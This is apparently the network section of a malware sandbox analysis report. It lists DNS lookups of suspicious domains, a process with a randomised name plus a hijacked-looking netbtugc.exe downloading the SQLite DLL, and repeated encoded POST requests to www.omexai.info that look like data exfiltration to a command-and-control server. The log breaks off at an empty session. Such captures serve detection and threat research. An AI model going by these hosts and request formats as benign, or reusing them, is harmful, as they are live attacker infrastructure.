Sep 5, 2024 09:05:32.768199921 CEST	8.8.8.8	192.168.2.22	0xd0a5	No error (0)	www.sqlite.org		45.33.6.223	A (IP address)	IN (0x0001)	false
Sep 5, 2024 09:05:42.963404894 CEST	8.8.8.8	192.168.2.22	0x4137	No error (0)	www.omexai.info	omexai.info		CNAME (Canonical name)	IN (0x0001)	false
Sep 5, 2024 09:05:42.963404894 CEST	8.8.8.8	192.168.2.22	0x4137	No error (0)	omexai.info		3.33.130.190	A (IP address)	IN (0x0001)	false
Sep 5, 2024 09:05:42.963404894 CEST	8.8.8.8	192.168.2.22	0x4137	No error (0)	omexai.info		15.197.148.33	A (IP address)	IN (0x0001)	false
Sep 5, 2024 09:05:53.858009100 CEST	8.8.8.8	192.168.2.22	0x22db	No error (0)	www.tekilla.wtf	redirect.3dns.box		CNAME (Canonical name)	IN (0x0001)	false
Sep 5, 2024 09:05:53.858009100 CEST	8.8.8.8	192.168.2.22	0x22db	No error (0)	redirect.3dns.box		172.191.244.62	A (IP address)	IN (0x0001)	false
Sep 5, 2024 09:06:04.496222019 CEST	8.8.8.8	192.168.2.22	0xade4	No error (0)	www.bola88site.one	bola88site.one		CNAME (Canonical name)	IN (0x0001)	false
Sep 5, 2024 09:06:04.496222019 CEST	8.8.8.8	192.168.2.22	0xade4	No error (0)	bola88site.one		172.96.191.39	A (IP address)	IN (0x0001)	false
Sep 5, 2024 09:06:16.318288088 CEST	8.8.8.8	192.168.2.22	0x2322	No error (0)	www.languagemodel.pro	webredir.vip.gandi.net		CNAME (Canonical name)	IN (0x0001)	false
Sep 5, 2024 09:06:16.318288088 CEST	8.8.8.8	192.168.2.22	0x2322	No error (0)	webredir.vip.gandi.net		217.70.184.50	A (IP address)	IN (0x0001)	false
Sep 5, 2024 09:06:27.189970016 CEST	8.8.8.8	192.168.2.22	0x371	No error (0)	www.kexweb.top		63.250.47.40	A (IP address)	IN (0x0001)	false
Sep 5, 2024 09:06:37.944360971 CEST	8.8.8.8	192.168.2.22	0xd0c0	No error (0)	www.jobworklanka.online	jobworklanka.online		CNAME (Canonical name)	IN (0x0001)	false
Sep 5, 2024 09:06:37.944360971 CEST	8.8.8.8	192.168.2.22	0xd0c0	No error (0)	jobworklanka.online		91.184.0.200	A (IP address)	IN (0x0001)	false
Sep 5, 2024 09:06:48.732243061 CEST	8.8.8.8	192.168.2.22	0xa6f7	No error (0)	www.dyme.tech		13.248.169.48	A (IP address)	IN (0x0001)	false
Sep 5, 2024 09:06:48.732243061 CEST	8.8.8.8	192.168.2.22	0xa6f7	No error (0)	www.dyme.tech		76.223.54.146	A (IP address)	IN (0x0001)	false
Sep 5, 2024 09:06:59.465253115 CEST	8.8.8.8	192.168.2.22	0xffc3	No error (0)	www.arlon-commerce.com	whois-unverified.domainbox.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
Sep 5, 2024 09:07:10.578748941 CEST	8.8.8.8	192.168.2.22	0x3db0	No error (0)	www.mizuquan.top		43.242.202.169	A (IP address)	IN (0x0001)	false
Sep 5, 2024 09:07:27.450927973 CEST	8.8.8.8	192.168.2.22	0x2ca3	No error (0)	www.nobartv6.website		103.224.182.242	A (IP address)	IN (0x0001)	false
Sep 5, 2024 09:07:38.689306021 CEST	8.8.8.8	192.168.2.22	0xa670	No error (0)	www.sailnway.net	redirect.natrocdn.com		CNAME (Canonical name)	IN (0x0001)	false
Sep 5, 2024 09:07:38.689306021 CEST	8.8.8.8	192.168.2.22	0xa670	No error (0)	redirect.natrocdn.com	natroredirect.natrocdn.com		CNAME (Canonical name)	IN (0x0001)	false
Sep 5, 2024 09:07:38.689306021 CEST	8.8.8.8	192.168.2.22	0xa670	No error (0)	natroredirect.natrocdn.com		85.159.66.93	A (IP address)	IN (0x0001)	false
Sep 5, 2024 09:07:49.771651983 CEST	8.8.8.8	192.168.2.22	0x183a	No error (0)	www.chinaen.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 5, 2024 09:07:49.771651983 CEST	8.8.8.8	192.168.2.22	0x183a	No error (0)	www.chinaen.org		188.114.97.3	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.elsupertodo.net

www.sqlite.org

www.omexai.info

www.tekilla.wtf

www.bola88site.one

www.languagemodel.pro

www.kexweb.top

www.jobworklanka.online

www.dyme.tech

www.mizuquan.top

www.nobartv6.website

www.sailnway.net

www.chinaen.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.22	49161	148.72.152.174	80	1036	C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe

Timestamp	Bytes transferred	Direction	Data
Sep 5, 2024 09:05:27.377155066 CEST	560	OUT	GET /2jit/?A8_pSPdX=iS4P4oRSl8BXKzGHILRVAF4LAAl1IYK6JXAZlPSQukWhX6ryYmutxv+d9ucM3CL7kJipDUdSquhSox7e6HgmYI08bz3IIKp3NcTDvEuGYqTKDQ0c7nXfRnBNa46x&38R0=jHY4nFvHAVc8 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Host: www.elsupertodo.net Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Sep 5, 2024 09:05:27.891539097 CEST	543	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Thu, 05 Sep 2024 07:05:27 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.elsupertodo.net/2jit/?A8_pSPdX=iS4P4oRSl8BXKzGHILRVAF4LAAl1IYK6JXAZlPSQukWhX6ryYmutxv+d9ucM3CL7kJipDUdSquhSox7e6HgmYI08bz3IIKp3NcTDvEuGYqTKDQ0c7nXfRnBNa46x&38R0=jHY4nFvHAVc8 X-XSS-Protection: 1; mode=block Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.22	49162	45.33.6.223	80	3728	C:\Windows\SysWOW64\netbtugc.exe

Timestamp	Bytes transferred	Direction	Data
Sep 5, 2024 09:05:32.783996105 CEST	287	OUT	GET /2022/sqlite-dll-win32-x86-3370000.zip HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Host: www.sqlite.org Connection: Keep-Alive Cache-Control: no-cache
Sep 5, 2024 09:05:33.413702965 CEST	312	IN	HTTP/1.1 404 Not Found Connection: close Date: Thu, 05 Sep 2024 07:05:33 GMT Content-type: text/html; charset=utf-8 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 20 6c 69 6e 65 6e 6f 3d 22 33 38 30 22 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 44 6f 63 75 6d 65 6e 74 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 2f 32 30 32 32 2f 73 71 6c 69 74 65 2d 64 6c 6c 2d 77 69 6e 33 32 2d 78 38 36 2d 33 33 37 30 30 30 30 2e 7a 69 70 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><title lineno="380">Not Found</title></head><body><h1>Document Not Found</h1>The document /2022/sqlite-dll-win32-x86-3370000.zip is not available on this server</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.22	49163	45.33.6.223	80	3728	C:\Windows\SysWOW64\netbtugc.exe

Timestamp	Bytes transferred	Direction	Data
Sep 5, 2024 09:05:35.048686981 CEST	287	OUT	GET /2022/sqlite-dll-win32-x86-3370000.zip HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Host: www.sqlite.org Connection: Keep-Alive Cache-Control: no-cache
Sep 5, 2024 09:05:35.570339918 CEST	312	IN	HTTP/1.1 404 Not Found Connection: close Date: Thu, 05 Sep 2024 07:05:35 GMT Content-type: text/html; charset=utf-8 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 20 6c 69 6e 65 6e 6f 3d 22 33 38 30 22 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 44 6f 63 75 6d 65 6e 74 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 2f 32 30 32 32 2f 73 71 6c 69 74 65 2d 64 6c 6c 2d 77 69 6e 33 32 2d 78 38 36 2d 33 33 37 30 30 30 30 2e 7a 69 70 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><title lineno="380">Not Found</title></head><body><h1>Document Not Found</h1>The document /2022/sqlite-dll-win32-x86-3370000.zip is not available on this server</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.22	49164	45.33.6.223	80	3728	C:\Windows\SysWOW64\netbtugc.exe

Timestamp	Bytes transferred	Direction	Data
Sep 5, 2024 09:05:35.740256071 CEST	287	OUT	GET /2021/sqlite-dll-win32-x86-3360000.zip HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Host: www.sqlite.org Connection: Keep-Alive Cache-Control: no-cache
Sep 5, 2024 09:05:36.251974106 CEST	249	IN	HTTP/1.1 200 OK Connection: keep-alive Date: Thu, 05 Sep 2024 07:05:36 GMT Last-Modified: Mon, 15 Nov 2021 22:45:13 GMT Cache-Control: max-age=120 ETag: "m6192e2f9s87b79" Content-type: application/zip; charset=utf-8 Content-length: 555897
Sep 5, 2024 09:05:36.252147913 CEST	1236	IN	Data Raw: 50 4b 03 04 14 00 00 00 08 00 e0 0e d3 52 89 f2 7f 56 6c 06 00 00 06 1c 00 00 0b 00 1c 00 73 71 6c 69 74 65 33 2e 64 65 66 55 54 09 00 03 04 ec cc 60 04 ec cc 60 75 78 0b 00 01 04 e8 03 00 00 04 e8 03 00 00 85 98 cb d6 db 26 10 80 f7 7d 9b 24 3d Data Ascii: PKRVlsqlite3.defUT``ux&}$=9}vF21o;OA`1(]\|#`Jz2udJ&<x34a.V#gM`a/Ly[WfFI:ou?dVlV6Po%389X^
Sep 5, 2024 09:05:36.252242088 CEST	1236	IN	Data Raw: ca 5c ec 4d b9 8b 9d 54 2e 4b cd 52 b5 54 d3 78 ad b4 a4 c4 3c b9 83 6d f7 af 1a 77 12 ce 5b 94 4a d5 0b e5 77 e1 a7 5b c7 4c 6f de b5 43 ba 0b 61 54 a3 27 38 3b fb 0d ef 57 3f 1a cc 8b 91 c8 ae f3 bc bb 05 8f 15 78 89 15 4e 01 79 2e 74 ba ca a3 Data Ascii: \MT.KRTx<mw[Jw[LoCaT'8;W?xNy.t,T,WO5tJR?Vurj27Am\| T0VUoV.XuQG9HxI^-ehstE`Moq;5X WO~XSx$[0
Sep 5, 2024 09:05:36.252254009 CEST	448	IN	Data Raw: 27 d9 03 2b 1b e0 67 17 92 97 95 0d db 1f 5f 06 18 ac 74 69 6a 6a 55 ab b4 ee 1d c3 ea ee 92 aa 80 f0 93 c9 90 2c 2b 9c bd 83 de 67 79 17 90 60 bc 2a f8 37 18 a0 2c 05 50 85 8f cb dd fc 6e c4 41 da 7a 84 bf 4c b6 3e 87 f9 a4 b3 ef d8 20 20 f7 1b Data Ascii: '+g_tijjU,+gy`*7,PnAzL> 3bb@yu'a^AH]tKx NB3{%=PzgzPy@/hCEBRUPycDLv5HT3\|[j8(w[l4U{=z crQz
Sep 5, 2024 09:05:36.252268076 CEST	1236	IN	Data Raw: 18 96 f7 27 13 05 7a a1 b8 c1 ff d1 6d 88 5e a1 50 9e df 15 8e ca 0b c3 5d f6 63 e5 96 08 02 71 5f 34 5e 8b 56 18 8c d4 df a4 5b e4 21 4e 7a e7 da ca 7e 75 95 65 54 6b 58 7f 22 c8 5a e5 b6 a7 47 1b c5 e9 70 ad e2 08 26 a1 6a 05 ce 89 6b 10 fd 45 Data Ascii: 'zm^P]cq_4^V[!Nz~ueTkX"ZGp&jkE6bCz,}ZY?M1k1,(q:]FsRSag0iYnQJ@Xzb\|D~`)]=yoKvcbq2Vf<OA%Uxnm%%Zdz ZH
Sep 5, 2024 09:05:36.253314972 CEST	1236	IN	Data Raw: cb a1 74 79 20 be ec b6 35 07 12 c8 67 1f a3 a4 dd 77 96 1b 94 03 41 e2 0e 52 77 b3 dc 1a 26 9e 63 6f 9a dc c1 49 9e 63 ea 87 55 ad 1b a7 ca cd 61 d9 ab 18 70 0a 57 88 53 ec 01 dc f7 7c ea 38 8c 13 e3 fa da e4 56 43 df 49 d9 1b 34 d0 fc 53 84 23 Data Ascii: ty 5gwARw&coIcUapWS\|8VCI4S#y)N>vfC.Zvtz=3`6Y<R7PM[_:7A=0ksLszIUV8{'X}`b&E.+ lTw>kZB
Sep 5, 2024 09:05:36.253325939 CEST	1236	IN	Data Raw: 3a 97 a7 d7 c3 8b ec 86 e3 71 b3 58 41 9f 8c e0 58 8a b0 5e 0b b7 f5 d6 5e 57 2a bf 17 39 4f a9 50 06 ce be c2 2d 6f 9e 6d d8 8b 8a 50 29 bb c9 35 9b ed b7 76 69 26 a6 6d 8d 87 08 b6 b5 a6 8c 02 dd 18 76 a5 a9 56 96 1c a7 27 87 17 a6 c1 e8 da 7b Data Ascii: :qXAX^^W9OP-omP)5vi&mvV'{\|^8(]Y6/Wn&2-DNv5fQRB<:^_.In@#Foccf'&;1s3;1NL,5(L$A{kElT 'nx[0
Sep 5, 2024 09:05:36.253344059 CEST	1236	IN	Data Raw: 7e 66 6a 80 56 6d 3f d1 e6 6c da ff a2 05 db 7e 68 44 f7 07 24 23 45 5c ae 53 fa 26 d4 45 16 d9 a8 5c cd 36 d6 72 4a df c0 81 98 6f a5 f3 93 c8 27 18 49 57 66 e6 81 f4 4c 9a 41 86 7c 13 56 92 f0 c1 a5 be b3 8c b8 cd e7 b9 8b 88 bf 4d e1 b1 39 ba Data Ascii: ~fjVm?l~hD$#E\S&E\6rJo'IWfLA\|VM92tP8IL+CJL:LA>t`z}z`:{J$8z35\4gNI2k"B?y]\if4:%qqCV%)/82
Sep 5, 2024 09:05:36.253355980 CEST	1236	IN	Data Raw: c8 36 0b b4 f6 38 d2 44 90 70 f3 8f f9 f3 bb 80 b8 d0 38 25 9f 69 0b 48 83 34 01 f6 15 60 26 06 94 77 90 c7 f0 1c 23 46 20 5d 98 9f 11 2f dc 4a e2 61 7f cb 0b 65 0d e8 cc 2f 5b 55 e4 f8 be 18 26 6a c0 f2 c2 15 9a df dd d7 07 e4 ff d2 ac 3e 58 62 Data Ascii: 68Dp8%iH4`&w#F ]/Jae/[U&j>Xb+5m~\?9KX7K[<qx8gV{cj>.N"3$*+HrJjnyr.]P]#mK\'f#43'[Ia][.XTJb/@
Sep 5, 2024 09:05:36.253369093 CEST	552	IN	Data Raw: 95 30 a8 89 78 82 b0 07 83 3c 61 f3 03 b1 cc 49 b5 d2 58 a6 9d ca 4c 45 cd 94 3f 17 e3 cc e1 c7 53 aa 02 20 45 50 4f b0 62 32 b9 87 e6 f2 fe 65 3c f4 1d 4f 1a d5 3d 64 15 af 4e 47 3d 02 ef 2f e4 75 bc 2c ad 41 7d 9b ac e7 19 97 b5 28 7a cf 41 f9 Data Ascii: 0x<aIXLE?S EPOb2e<O=dNG=/u,A}(zAwnp&)Gk[\ngv$F90!_F1c6Fq8$66m\|iR]&H'&:Zbf]cL7ZsauT?1q
Sep 5, 2024 09:05:36.259322882 CEST	1236	IN	Data Raw: 8d 51 ca 3b e0 de 3c 3d 9a 72 ad c9 dd c3 44 f6 38 56 be 15 e2 95 ab 20 54 f4 ba 62 60 15 db c4 04 8c b8 15 1b 78 37 14 7b 07 7e 7d 83 9a d3 85 36 76 8e 6d 77 5c f2 8e 5b 33 68 cb a6 5b 1c e6 c4 f9 bc fa cd ad 3c 97 62 88 77 c1 f2 e9 71 12 57 92 Data Ascii: Q;<=rD8V Tb`x7{~}6vmw\[3h[<bwqWfPi00N5FediyK}\Y]Cm7dS3/T,H; `"[bV'Gx-,X&MZ{1`DY?A9}\|)Y\|Cxoq

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.22	49165	3.33.130.190	80	1036	C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe

Timestamp	Bytes transferred	Direction	Data
Sep 5, 2024 09:05:42.982327938 CEST	2472	OUT	POST /7xi5/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Host: www.omexai.info Origin: http://www.omexai.info Content-Type: application/x-www-form-urlencoded Content-Length: 2165 Connection: close Cache-Control: max-age=0 Referer: http://www.omexai.info/7xi5/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Data Raw: 41 38 5f 70 53 50 64 58 3d 76 7a 67 59 35 44 63 68 62 55 54 75 44 67 51 66 56 72 59 48 6f 4a 73 47 66 76 58 6d 66 56 49 69 6c 35 4e 49 74 2f 59 45 37 53 54 74 48 67 4a 37 37 66 63 70 6c 61 79 36 4a 33 78 46 55 77 4a 63 73 42 44 66 78 43 74 2b 6d 2b 2f 2f 54 59 42 79 4b 4b 38 61 45 6a 76 4e 58 54 48 79 6a 31 71 35 74 62 31 4a 38 54 59 4e 65 65 46 37 2b 4c 4b 6b 65 70 77 74 64 67 52 71 4f 6d 73 56 69 72 6c 51 47 55 4a 6b 6c 66 7a 4f 48 6e 50 79 37 69 4d 35 55 38 69 47 47 61 6e 69 6a 4e 34 46 71 78 30 78 2b 55 2b 6a 55 4d 6a 38 52 6f 66 42 50 58 49 30 6e 6e 46 78 72 7a 75 54 58 62 6b 30 42 55 71 63 35 77 7a 35 7a 4e 31 4d 2f 52 65 72 6e 68 64 42 61 46 4e 79 48 6f 6d 75 43 76 70 2b 38 55 44 36 6c 54 54 49 7a 43 55 54 43 38 4b 69 6e 5a 66 33 66 35 44 79 77 39 45 34 46 73 62 4a 4b 4c 2f 62 72 46 76 48 61 78 54 63 75 6d 57 39 44 55 76 65 69 2b 34 35 48 66 53 30 39 2b 68 35 43 52 32 4c 6f 50 4a 38 67 31 2f 2f 45 43 32 37 4b 45 4c 79 70 43 59 4c 2b 57 51 71 61 33 79 67 62 6f 67 4c 2b 65 7a 63 70 75 5a 55 78 [TRUNCATED] Data Ascii: A8_pSPdX=vzgY5DchbUTuDgQfVrYHoJsGfvXmfVIil5NIt/YE7STtHgJ77fcplay6J3xFUwJcsBDfxCt+m+//TYByKK8aEjvNXTHyj1q5tb1J8TYNeeF7+LKkepwtdgRqOmsVirlQGUJklfzOHnPy7iM5U8iGGanijN4Fqx0x+U+jUMj8RofBPXI0nnFxrzuTXbk0BUqc5wz5zN1M/RernhdBaFNyHomuCvp+8UD6lTTIzCUTC8KinZf3f5Dyw9E4FsbJKL/brFvHaxTcumW9DUvei+45HfS09+h5CR2LoPJ8g1//EC27KELypCYL+WQqa3ygbogL+ezcpuZUx2W9AZYlHru+iKcFh4WWQ4AlqkQ2V+H/XPbk67Y78M5AFufCF5EzJyGHab234DK2tzudBSpYAkPcWZTzWa97jTvnmtEntpc0AnBluzUJlk7XyBLgiBzVnNhK23uos3F4cGbgZB651pc2k73YIyj7VA0oesdduGZTUQxXykat4yz/vf92YZxk5cKYe2Ikl0ey7rKbUOcdTCq9ogU+TnKLbvhHglKFOax4wLcKezpT8DKaYh1mnXopEu3KAiKRwRhg/R/3qjfEJIi0hTnmFh5owS8y+JuIoYrIbrDergvME1oUXGD0VwD3pSu604NCzOHPOeL2Zl4kUmlz6A2cwMzwQHhq5nopHYK3gfe9yHXWWV1a8E3nZWJmMnc3kozTkUh5tpmzxNsOH65hCINxkuKEwIOGx9S9e/0ngfaGYhiYM/4ppGapzFv7w+AZ9rZidsVn6ylvr0kt79GP3mDie8u6Eq8ZlNtBpvGOXX2i85fnl9/Nk9m8E8F8BiuDEbJ+/881LmpVt3sNJq5axv63lqLXk3xYjmjwSQH4xU4L5lcIgOUqCG5Q3Qr9P/AUnrTYXCBMywD9gbFhhdO3NMMI18RNUj8FdsQIm5WMUP77tbjJCoip260OJMcKgRFzjjaIm3pSeqOGoHXrEZVOpeO39NjprYqwcUuYRB1jmwq [TRUNCATED]
Sep 5, 2024 09:05:42.987457991 CEST	298	OUT	Data Raw: 57 67 61 34 63 49 66 47 48 30 57 32 69 7a 65 2b 7a 59 58 45 39 42 70 61 42 62 32 78 68 6c 45 4a 67 48 74 6d 61 52 34 64 46 58 58 56 6f 4b 73 2b 63 37 34 46 77 6f 37 64 74 65 4b 68 54 45 44 2f 49 78 75 77 73 39 61 52 35 2b 44 41 42 52 53 61 41 47 Data Ascii: Wga4cIfGH0W2ize+zYXE9BpaBb2xhlEJgHtmaR4dFXXVoKs+c74Fwo7dteKhTED/Ixuws9aR5+DABRSaAGW1AY94Gg9rV5wJghIauJrjNa/I2pYHrEgP1OdfJ/9RTz3YE+bdQRqqx8cEdtjH7Q5geH6nmKrK2eNgu/yjUPwyRH9RVMPKOJ+VWYE8Nr1r2nMALBHHaXbHCHHbDfsEXiz5xsc44ME8g/mbQPyf8H600ZaD27IvM48

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.22	49166	3.33.130.190	80	1036	C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe

Timestamp	Bytes transferred	Direction	Data
Sep 5, 2024 09:05:45.532651901 CEST	2472	OUT	POST /7xi5/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Host: www.omexai.info Origin: http://www.omexai.info Content-Type: application/x-www-form-urlencoded Content-Length: 3629 Connection: close Cache-Control: max-age=0 Referer: http://www.omexai.info/7xi5/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Data Raw: 41 38 5f 70 53 50 64 58 3d 76 7a 67 59 35 44 63 68 62 55 54 75 43 44 49 66 59 35 77 48 2f 35 73 4a 58 50 58 6d 66 56 49 73 6c 35 4e 41 74 2f 59 45 37 57 37 74 48 69 42 37 34 50 63 70 6d 61 79 37 41 58 78 46 55 77 4a 66 73 42 48 50 78 43 68 49 6d 34 7a 2f 54 5a 42 79 4b 4a 55 61 4e 44 76 4e 49 44 48 30 6a 31 32 79 74 62 35 56 38 54 45 33 65 63 70 37 34 70 43 6b 64 37 6f 69 47 67 52 6f 4b 57 73 43 69 72 70 44 47 55 42 30 6c 61 69 57 48 6c 4c 79 34 53 4d 35 66 73 69 48 45 61 6e 6a 79 64 34 48 71 78 49 49 2b 55 2b 6e 55 4d 32 62 52 6f 62 42 4f 42 38 30 6e 6b 74 79 6b 44 75 51 59 37 6b 30 50 30 71 65 35 77 7a 6c 7a 4e 31 4d 2f 51 53 72 6d 78 64 42 61 48 31 7a 61 34 6d 75 50 50 70 76 69 6b 48 55 6c 53 7a 58 7a 43 6b 44 43 50 6d 69 6d 63 72 33 59 4a 44 79 6e 39 45 79 46 73 62 2b 64 62 2f 68 72 46 6e 50 61 31 32 44 75 6d 57 39 44 58 33 65 31 34 6b 35 52 2f 53 30 69 75 68 34 4a 78 32 45 6f 50 46 43 67 32 6a 2f 45 48 61 37 4b 32 54 79 35 77 41 45 6d 32 51 76 65 33 79 6d 4b 34 67 61 2b 65 75 35 70 74 34 50 78 [TRUNCATED] Data Ascii: A8_pSPdX=vzgY5DchbUTuCDIfY5wH/5sJXPXmfVIsl5NAt/YE7W7tHiB74Pcpmay7AXxFUwJfsBHPxChIm4z/TZByKJUaNDvNIDH0j12ytb5V8TE3ecp74pCkd7oiGgRoKWsCirpDGUB0laiWHlLy4SM5fsiHEanjyd4HqxII+U+nUM2bRobBOB80nktykDuQY7k0P0qe5wzlzN1M/QSrmxdBaH1za4muPPpvikHUlSzXzCkDCPmimcr3YJDyn9EyFsb+db/hrFnPa12DumW9DX3e14k5R/S0iuh4Jx2EoPFCg2j/EHa7K2Ty5wAEm2Qve3ymK4ga+eu5pt4PxyS9AfElLpW+l6cCsYWSU4cxqkZlV+LFXNPk7qY7/PBPbOfbC5EtYCH4abyV4Dq2tHSdCWZYETbTDZS1Sa8z5jugmtQvtoskBWxloTUJjBnY0hL5qhyOtthU23vbs1N3c0LgZAK508w2k73bYijhcg4wesZZuFtDUTpX8Vqt4wL/mf92Q5xjrcK4e2cel0HQ7fqbXt0dVAS9vAU4VnKWWPhgglaFObVRwLEKfX1T+iKaBx1qq3oAEu3GAiOnwRxa/Tb3qjzEd5i0pznjHh4g0S8R+JWYoYXibqLerAPMXx0UFWD2XwD3jyv504FozObAOfD2ZQkkcmlywg2d2MzvUHh05n4pHYG3gf29y0PWTmta+03pHmIhFGg+koDfkVkitqizzcsOOYhmcINrxeLL0IOux9S5e6UOhv6GYUuYfaMqmGau5luttuAl9rI1dtx35BBvr0Ut7vePwWDie8u5Eq8ClNhVptPpXX2i9ofnkITNsdm5KsFdLCudEb8f/8kfLltVsj4NJq5F//60sKLIk39/jmjeSQL4xhoLrnUIgs8qKG5QngriGfAXnrSDXHpcyxD9hqphgoa0GcMNz8RldDAedscbm7aMV/X7/5LJC4ippq0NRccfkUcwji2ym0gZfbeGyUfrXepJweO2ytjrrYWqcVWARA8emxy [TRUNCATED]
Sep 5, 2024 09:05:45.537570000 CEST	1762	OUT	Data Raw: 58 35 61 36 6b 6d 66 45 76 30 57 33 43 7a 51 35 6e 59 58 6b 39 43 30 4b 42 47 32 78 68 2f 45 4a 34 35 74 6e 6d 42 34 65 74 58 4e 7a 63 4b 73 4a 49 37 31 56 77 75 37 64 74 75 55 52 66 48 44 2f 4a 49 75 77 30 39 61 51 4a 2b 44 47 42 52 53 71 41 46 Data Ascii: X5a6kmfEv0W3CzQ5nYXk9C0KBG2xh/EJ45tnmB4etXNzcKsJI71Vwu7dtuURfHD/JIuw09aQJ+DGBRSqAFblAj0YGnrbVTwJhFIffcrhBa+dqpIVPEh/1AKPI55Ru03Z5xbcgBq6R8dyRtpUDQoQeT5nmLrK62NgejyiE1zAlHnBVMFpnf6VWeNcN61r2PMADFHFOHbDKHHZrft0Xj6pxqf44WE88ambIhycUH60oZajm7PvM41

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.22	49167	3.33.130.190	80	1036	C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe

Timestamp	Bytes transferred	Direction	Data
